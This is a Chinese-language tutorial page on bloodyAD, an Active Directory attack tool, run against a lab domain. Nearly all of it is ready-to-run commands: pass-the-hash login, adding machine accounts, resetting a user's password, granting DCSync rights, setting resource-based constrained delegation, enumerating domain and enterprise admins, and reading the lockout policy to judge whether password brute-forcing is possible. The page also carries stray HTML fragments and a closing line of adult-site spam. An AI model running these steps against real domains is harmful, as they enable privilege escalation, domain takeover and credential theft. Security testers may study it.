<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          使用bloodyAD對(duì)域?qū)傩赃M(jìn)行查詢與修改

          共 3412字,需瀏覽 7分鐘

           ·

          2022-10-15 14:27

          對(duì)域?qū)傩赃M(jìn)行查詢與修改

          使用bloody AD




          項(xiàng)目地址:

          https://github.com/CravateRouge/bloodyAD


          該工具有如下一些功能:


          - delObject :刪除對(duì)象

          - addObjectToGroup 

          - addForeignObjectToGroup 

          - delObjectFromGroup 

          - setShadowCredentials 

          - setGenericAll 

          - setOwner 

          - setRbcd 

          - setDCSync 

          - setUserAccountControl





          1
           認(rèn)證

          使用-u參數(shù)指定用戶,-p參數(shù)指定明文密碼或Hash。


          1

          #使用test用戶,密碼為P@ss1234

          -u test -p P@ss1234

          #使用win7機(jī)器賬號(hào)和Hash認(rèn)證

          -u win7\$ -p aad3b435b51404ee

          aad3b435b51404ee:53ebb01b78

          a294aec70afe9a068be55d





          2
          新建機(jī)器用戶
          使用普通域用戶即可創(chuàng)建機(jī)器用戶machine$,密碼為root。

          1

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 addComputer machine 'root'





          3
          修改對(duì)象屬性
          執(zhí)行如下命令修改指定對(duì)象的dNSHostName屬性為DC01.xie.com。

          1

          python3 bloodyAD.py -d xie.com -u 

          test -p P@ss1234 --host 10.211.55.4 setAttribute 'CN=machine3,CN=Computers,

          DC=xie,DC=com' dNSHostName 

          '["DC01.xie.com"]'






          4
          修改用戶的密碼
          修改用戶hack的密碼為P@ssword1234。

          1

          python3 bloodyAD.py -d xie.com -u administrator -p P@ssword1234 --host 10.211.55.4 changePassword  hack 'P@ssword1234'





          5
          添加/移除DCSync



          1

          #給域用戶hack添加DCSync

          python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack

          #移除域用戶hack的DCSync

          python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setDCSync hack False






          6
          添加/移除RBCD


          1

          #添加機(jī)器賬號(hào)machine對(duì)機(jī)器win10的RBCD

          python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$

          #移除機(jī)器賬號(hào)machine對(duì)機(jī)器win10的RBCD

          python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p P@ssword1234 --host 10.211.55.4 setRbcd machine win10$ False






          7
          查詢對(duì)象


          查詢域內(nèi)所有用戶


          1

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Users,DC=xie,DC=com' user




          查詢域內(nèi)所有機(jī)器


          2

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'CN=Computers,DC=xie,DC=com' user




          查詢域管/企業(yè)管理員


          3

          #查詢域管

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Domain Admins,CN=Users,DC=xie,DC=com' member

          #查詢企業(yè)管理員

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=Enterprise Admins,CN=Users,DC=xie,DC=com' member





          查詢域的所有Container容器


          4

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getChildObjects 'DC=xie,DC=com' container





          查詢指定對(duì)象屬性


          5

          #查詢指定對(duì)象所有屬性

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com'

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes CN=machine4

          #查詢指定對(duì)象指定servicePrincipalName屬性

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com' servicePrincipalName






          查詢域的MAQ屬性


          6

          python3 bloodyAD.py -d xie.com -u test -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' ms-DS-MachineAccountQuota





          查詢域的密碼鎖定策略


          如下圖,目標(biāo)域的密碼鎖定策略是5,當(dāng)錯(cuò)誤大于5次時(shí),用戶被鎖定。當(dāng)該值為0時(shí),說(shuō)明沒(méi)密碼鎖定策略,可以進(jìn)行爆破。


          7

          python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' LockoutThreshold





          查詢域的密碼鎖定時(shí)間


          8

          python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' lockoutDuration





          查詢域的密碼長(zhǎng)度最小值


          9

          python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' minPwdLength





          查詢域功能級(jí)別


          10

          python3 bloodyAD.py -d xie.com -u hack -p P@ss1234 --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' msDS-Behavior-Version





          END




          瀏覽 108
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          評(píng)論
          圖片
          表情
          推薦
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  成人午夜无码影院 | 一区二区三区三区无码 | 天天干天天爽 | 91视频在线 | 免费观看黄色亚洲网站 |